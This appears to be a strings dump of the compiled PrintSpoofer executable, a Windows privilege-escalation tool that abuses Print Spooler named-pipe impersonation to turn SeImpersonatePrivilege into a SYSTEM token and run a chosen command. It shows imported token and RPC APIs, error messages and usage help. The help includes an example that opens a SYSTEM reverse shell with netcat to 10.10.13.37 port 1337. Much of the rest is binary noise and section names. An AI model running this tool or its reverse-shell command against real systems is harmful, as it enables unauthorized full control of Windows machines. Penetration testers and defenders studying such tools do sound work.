!This program cannot be run in DOS mode.
6Richt
`.rdata
@.data
@.reloc
t$Lh H@
SVWjD3
M9=xc@
u"h@c@
ncacn_np
\pipe\spoolss
.text$mn
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIZ
.CRT$XPA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
GetCurrentProcess
CreateNamedPipeW
WaitForSingleObject
GetSystemDirectoryW
CreateEventW
GetLastError
GetCurrentThread
CloseHandle
CreateThread
GetComputerNameW
ConnectNamedPipe
KERNEL32.dll
GetTokenInformation
OpenThreadToken
DuplicateTokenEx
ConvertStringSecurityDescriptorToSecurityDescriptorW
CreateProcessAsUserW
InitializeSecurityDescriptor
ImpersonateNamedPipeClient
OpenProcessToken
CreateProcessWithTokenW
LookupPrivilegeNameW
SetTokenInformation
RevertToSelf
AdjustTokenPrivileges
ADVAPI32.dll
NdrClientCall2
UuidToStringW
RpcBindingFromStringBindingW
RpcStringBindingComposeW
RpcStringFreeW
RpcBindingFree
UuidCreate
RPCRT4.dll
DestroyEnvironmentBlock
CreateEnvironmentBlock
USERENV.dll
_except_handler4_common
__current_exception
__current_exception_context
memset
VCRUNTIME140.dll
__acrt_iob_func
_wcsicmp
fflush
__stdio_common_vfwprintf
wcstoul
__stdio_common_vswprintf
malloc
_seh_filter_exe
_set_app_type
__setusermatherr
_configure_wide_argv
_initialize_wide_environment
_get_initial_wide_environment
_initterm
_initterm_e
_set_fmode
__p___argc
__p___wargv
_cexit
_c_exit
_register_thread_local_exe_atexit_callback
_configthreadlocale
_set_new_mode
__p__commode
_initialize_onexit_table
_register_onexit_function
_crt_atexit
_controlfp_s
terminate
api-ms-win-crt-stdio-l1-1-0.dll
api-ms-win-crt-string-l1-1-0.dll
api-ms-win-crt-convert-l1-1-0.dll
api-ms-win-crt-heap-l1-1-0.dll
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-locale-l1-1-0.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetModuleHandleW
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0E0K0Q0
2 2)232Z2j2~2
313<3D3d3h3l3p3t3x3|3
5 5I5V5\5w5
6%6.6H6
9%989S9i9}9
;$;.;4;D;\;q;{;
<0<7<F<o<}<
="=0=G=Z=`=e=k=}=
>%>O>T>
>+?V?k?p?u?
1"1)10171>1E1M1U1]1i1r1w1}1
3#3*303B3L3
3:4I4R4_4u4
4#5,525
606:6Z6
72777J7a7~7
8.979@9N9W9y9
:#:):/:5:;:A:K:
2 2$2,2828;<;
\0`0h0T3X3t3x3
[-] Invalid session id: %ws
[-] Missing value for option: -d
[-] Missing value for option: -c
[-] Invalid argument: %ls
[-] More than one interaction mode was specified.
[-] Please specify a command to execute
PrintSpoofer v%ws (by @itm4n)
Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print
Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()
Arguments:
-c <CMD> Execute the command *CMD*
-i Interact with the new process in the current command prompt (default is non-interactive)
-d <ID> Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
-h That's me :)
Examples:
- Run PowerShell as SYSTEM in the current console
PrintSpoofer.exe -i -c powershell.exe
- Spawn a SYSTEM command prompt on the desktop of the session 1
PrintSpoofer.exe -d 1 -c cmd.exe
- Get a SYSTEM reverse shell
PrintSpoofer.exe -c "c:\Temp\nc.exe 10.10.13.37 1337 -e cmd"
SeImpersonatePrivilege
[-] A privilege is missing: '%ws'
[+] Found privilege: %ws
[-] Failed to generate a name for the pipe.
[-] Failed to create a named pipe.
[-] Failed to connect the named pipe.
[+] Named pipe listening...
[-] Failed to trigger the Spooler service.
[-] Operation failed or timed out.
OpenProcessToken() failed. Error: %d
GetTokenInformation() failed. Error: %d
LookupPrivilegeName() failed. Error: %d
AdjustTokenPrivileges() failed. Error: %d
\\.\pipe\%ws\pipe\spoolss
InitializeSecurityDescriptor() failed. Error: %d
D:(A;OICI;GA;;;WD)
ConvertStringSecurityDescriptorToSecurityDescriptor() failed. Error: %d
CreateNamedPipe() failed. Error: %d
CreateEvent() failed. Error: %d
ConnectNamedPipe() failed. Error: %d
CreateThread() failed. Error: %d
\\%ws/pipe/%ws
ImpersonateNamedPipeClient(). Error: %d
OpenThreadToken(). Error: %d
DuplicateTokenEx() failed. Error: %d
SetTokenInformation() failed. Error: %d
GetSystemDirectory() failed. Error: %d
CreateEnvironmentBlock() failed. Error: %d
WinSta0\Default
[!] CreateProcessAsUser() failed because of a missing privilege, retrying with CreateProcessWithTokenW().
CreateProcessWithTokenW() failed. Error: %d
[+] CreateProcessWithTokenW() OK
[!] CreateProcessWithTokenW() isn't compatible with option -i
CreateProcessAsUser() failed. Error: %d
[+] CreateProcessAsUser() OK
\pipe\spoolss
ncacn_np
12345678-1234-ABCD-EF00-0123456789AB